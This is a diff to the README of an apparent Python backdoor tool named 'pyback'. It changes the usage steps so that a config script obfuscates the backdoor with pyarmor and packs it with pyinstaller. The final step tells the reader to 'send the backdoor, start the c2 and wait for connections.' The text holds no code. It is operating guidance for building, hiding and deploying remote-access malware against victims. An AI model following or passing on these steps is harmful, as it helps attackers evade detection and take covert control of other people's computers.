7h3w4lk3r/pyback/README.md

 `./setup.py`

 # Usage
-#### run the config.py script or edit the lib/setting.py manually.
+#### run the config.py script and follow the steps, you can choose to pack and obfuscate the backdoor automatically during the config operation.
 `./config.py`

-#### compile the backdoor however you want. i use pyinstaller.
-` pyinstaller --onefile --noconsole backdoor.py`
+#### the config script will use pyarmor for obfuscating all the scripts and then pyinstaller version 3.6 for packing the backdoor executable. ( these are both installed with the setup.py script )

 #### send the backdoor, start the c2 and wait for connections.
 `./cnc.py`